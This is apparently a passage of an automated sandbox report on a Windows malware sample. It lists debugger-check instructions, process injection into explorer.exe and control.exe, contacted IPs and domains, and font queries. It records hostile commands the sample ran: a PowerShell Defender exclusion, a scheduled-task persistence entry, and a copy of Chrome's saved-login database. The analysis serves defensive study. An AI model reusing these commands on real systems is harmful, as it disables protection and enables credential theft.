Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1608 mov eax, dword ptr fs:[00000030h] 21_2_046A1608
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461A61C mov eax, dword ptr fs:[00000030h] 21_2_0461A61C (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EE620 mov eax, dword ptr fs:[00000030h] 21_2_045EE620
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046116E0 mov ecx, dword ptr fs:[00000030h] 21_2_046116E0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04628EC7 mov eax, dword ptr fs:[00000030h] 21_2_04628EC7
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0469FEC0 mov eax, dword ptr fs:[00000030h] 21_2_0469FEC0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046136CC mov eax, dword ptr fs:[00000030h] 21_2_046136CC
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F76E2 mov eax, dword ptr fs:[00000030h] 21_2_045F76E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B8ED6 mov eax, dword ptr fs:[00000030h] 21_2_046B8ED6
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046646A7 mov eax, dword ptr fs:[00000030h] 21_2_046646A7
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B0EA5 mov eax, dword ptr fs:[00000030h] 21_2_046B0EA5 (3 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0467FE87 mov eax, dword ptr fs:[00000030h] 21_2_0467FE87
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B8F6A mov eax, dword ptr fs:[00000030h] 21_2_046B8F6A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FEF40 mov eax, dword ptr fs:[00000030h] 21_2_045FEF40
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FFF60 mov eax, dword ptr fs:[00000030h] 21_2_045FFF60
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461E730 mov eax, dword ptr fs:[00000030h] 21_2_0461E730
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460B73D mov eax, dword ptr fs:[00000030h] 21_2_0460B73D (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B070D mov eax, dword ptr fs:[00000030h] 21_2_046B070D (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461A70E mov eax, dword ptr fs:[00000030h] 21_2_0461A70E (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E4F2E mov eax, dword ptr fs:[00000030h] 21_2_045E4F2E (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460F716 mov eax, dword ptr fs:[00000030h] 21_2_0460F716
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0467FF10 mov eax, dword ptr fs:[00000030h] 21_2_0467FF10 (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046237F5 mov eax, dword ptr fs:[00000030h] 21_2_046237F5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F8794 mov eax, dword ptr fs:[00000030h] 21_2_045F8794
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04667794 mov eax, dword ptr fs:[00000030h] 21_2_04667794 (3 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A2073 mov eax, dword ptr fs:[00000030h] 21_2_046A2073
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B1074 mov eax, dword ptr fs:[00000030h] 21_2_046B1074
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04600050 mov eax, dword ptr fs:[00000030h] 21_2_04600050 (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461002D mov eax, dword ptr fs:[00000030h] 21_2_0461002D (5 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A830 mov eax, dword ptr fs:[00000030h] 21_2_0460A830 (4 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04667016 mov eax, dword ptr fs:[00000030h] 21_2_04667016 (3 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FB02A mov eax, dword ptr fs:[00000030h] 21_2_045FB02A (4 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B4015 mov eax, dword ptr fs:[00000030h] 21_2_046B4015 (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460B8E4 mov eax, dword ptr fs:[00000030h] 21_2_0460B8E4 (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E58EC mov eax, dword ptr fs:[00000030h] 21_2_045E58EC
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0467B8D0 mov eax, dword ptr fs:[00000030h] 21_2_0467B8D0 (5 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0467B8D0 mov ecx, dword ptr fs:[00000030h] 21_2_0467B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E40E1 mov eax, dword ptr fs:[00000030h] 21_2_045E40E1 (3 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h] 21_2_046120A0 (6 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046290AF mov eax, dword ptr fs:[00000030h] 21_2_046290AF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E9080 mov eax, dword ptr fs:[00000030h] 21_2_045E9080
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461F0BF mov ecx, dword ptr fs:[00000030h] 21_2_0461F0BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461F0BF mov eax, dword ptr fs:[00000030h] 21_2_0461F0BF (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04663884 mov eax, dword ptr fs:[00000030h] 21_2_04663884 (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460B944 mov eax, dword ptr fs:[00000030h] 21_2_0460B944 (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EB171 mov eax, dword ptr fs:[00000030h] 21_2_045EB171 (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EC962 mov eax, dword ptr fs:[00000030h] 21_2_045EC962
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04604120 mov eax, dword ptr fs:[00000030h] 21_2_04604120 (4 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04604120 mov ecx, dword ptr fs:[00000030h] 21_2_04604120
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461513A mov eax, dword ptr fs:[00000030h] 21_2_0461513A (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E9100 mov eax, dword ptr fs:[00000030h] 21_2_045E9100 (3 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046741E8 mov eax, dword ptr fs:[00000030h] 21_2_046741E8
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EB1E1 mov eax, dword ptr fs:[00000030h] 21_2_045EB1E1 (3 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046669A6 mov eax, dword ptr fs:[00000030h] 21_2_046669A6
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046161A0 mov eax, dword ptr fs:[00000030h] 21_2_046161A0 (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A49A4 mov eax, dword ptr fs:[00000030h] 21_2_046A49A4 (4 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046651BE mov eax, dword ptr fs:[00000030h] 21_2_046651BE (4 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h] 21_2_046099BF (8 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046099BF mov eax, dword ptr fs:[00000030h] 21_2_046099BF (4 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460C182 mov eax, dword ptr fs:[00000030h] 21_2_0460C182
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461A185 mov eax, dword ptr fs:[00000030h] 21_2_0461A185
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04612990 mov eax, dword ptr fs:[00000030h] 21_2_04612990
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0469B260 mov eax, dword ptr fs:[00000030h] 21_2_0469B260 (2 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B8A62 mov eax, dword ptr fs:[00000030h] 21_2_046B8A62
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0462927A mov eax, dword ptr fs:[00000030h] 21_2_0462927A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E9240 mov eax, dword ptr fs:[00000030h] 21_2_045E9240 (4 occurrences)
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04674257 mov eax, dword ptr fs:[00000030h] 21_2_04674257
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AEA55 mov eax, dword ptr fs:[00000030h] 21_2_046AEA55
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EAA16 mov eax, dword ptr fs:[00000030h] 21_2_045EAA16
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EAA16 mov eax, dword ptr fs:[00000030h] 21_2_045EAA16
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04624A2C mov eax, dword ptr fs:[00000030h] 21_2_04624A2C
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04624A2C mov eax, dword ptr fs:[00000030h] 21_2_04624A2C
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E5210 mov eax, dword ptr fs:[00000030h] 21_2_045E5210
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E5210 mov ecx, dword ptr fs:[00000030h] 21_2_045E5210
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E5210 mov eax, dword ptr fs:[00000030h] 21_2_045E5210
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E5210 mov eax, dword ptr fs:[00000030h] 21_2_045E5210
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F8A0A mov eax, dword ptr fs:[00000030h] 21_2_045F8A0A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04603A1C mov eax, dword ptr fs:[00000030h] 21_2_04603A1C
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AAA16 mov eax, dword ptr fs:[00000030h] 21_2_046AAA16
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AAA16 mov eax, dword ptr fs:[00000030h] 21_2_046AAA16
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04612AE4 mov eax, dword ptr fs:[00000030h] 21_2_04612AE4
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04612ACB mov eax, dword ptr fs:[00000030h] 21_2_04612ACB
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461FAB0 mov eax, dword ptr fs:[00000030h] 21_2_0461FAB0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FAAB0 mov eax, dword ptr fs:[00000030h] 21_2_045FAAB0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FAAB0 mov eax, dword ptr fs:[00000030h] 21_2_045FAAB0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461D294 mov eax, dword ptr fs:[00000030h] 21_2_0461D294
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461D294 mov eax, dword ptr fs:[00000030h] 21_2_0461D294
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h] 21_2_045E52A5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h] 21_2_045E52A5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h] 21_2_045E52A5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h] 21_2_045E52A5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h] 21_2_045E52A5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EF358 mov eax, dword ptr fs:[00000030h] 21_2_045EF358
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04613B7A mov eax, dword ptr fs:[00000030h] 21_2_04613B7A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04613B7A mov eax, dword ptr fs:[00000030h] 21_2_04613B7A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EDB40 mov eax, dword ptr fs:[00000030h] 21_2_045EDB40
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B8B58 mov eax, dword ptr fs:[00000030h] 21_2_046B8B58
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EDB60 mov ecx, dword ptr fs:[00000030h] 21_2_045EDB60
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A131B mov eax, dword ptr fs:[00000030h] 21_2_046A131B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h] 21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h] 21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h] 21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h] 21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h] 21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h] 21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460DBE9 mov eax, dword ptr fs:[00000030h] 21_2_0460DBE9
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046653CA mov eax, dword ptr fs:[00000030h] 21_2_046653CA
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046653CA mov eax, dword ptr fs:[00000030h] 21_2_046653CA
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04614BAD mov eax, dword ptr fs:[00000030h] 21_2_04614BAD
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04614BAD mov eax, dword ptr fs:[00000030h] 21_2_04614BAD
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04614BAD mov eax, dword ptr fs:[00000030h] 21_2_04614BAD
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B5BA5 mov eax, dword ptr fs:[00000030h] 21_2_046B5BA5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F1B8F mov eax, dword ptr fs:[00000030h] 21_2_045F1B8F
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F1B8F mov eax, dword ptr fs:[00000030h] 21_2_045F1B8F
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A138A mov eax, dword ptr fs:[00000030h] 21_2_046A138A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0469D380 mov ecx, dword ptr fs:[00000030h] 21_2_0469D380
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461B390 mov eax, dword ptr fs:[00000030h] 21_2_0461B390
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04612397 mov eax, dword ptr fs:[00000030h] 21_2_04612397
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0040A140 LdrLoadDll, 12_2_0040A140
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 38.34.163.59 80
Source: C:\Windows\explorer.exe Network Connect: 35.209.127.155 80
Source: C:\Windows\explorer.exe Domain query: www.properscooter.com
Source: C:\Windows\explorer.exe Domain query: www.jamesreadtanusa.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.116.236 80
Source: C:\Windows\explorer.exe Domain query: www.uspplongee.com
Source: C:\Windows\explorer.exe Domain query: www.bldh45.xyz
Source: C:\Windows\explorer.exe Network Connect: 5.183.8.183 80
Source: C:\Windows\explorer.exe Domain query: www.dems-clicks.com
Source: C:\Windows\explorer.exe Domain query: www.kickball.site
Source: C:\Windows\explorer.exe Network Connect: 35.241.47.216 80
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.216 80
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: DF0000
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Memory written: C:\Users\user\Desktop\iuvRyl9i7D.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Thread register set: target process: 3616
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3616
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: explorer.exe, 00000012.00000000.306887660.0000000005610000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.299535481.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.345614636.0000000005E60000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000012.00000000.299535481.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.339387652.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.322719517.00000000005C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000012.00000000.299535481.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.373339279.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.323354570.0000000000B50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager,
Source: explorer.exe, 00000012.00000000.299535481.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.373339279.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.323354570.0000000000B50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Users\user\Desktop\iuvRyl9i7D.exe VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
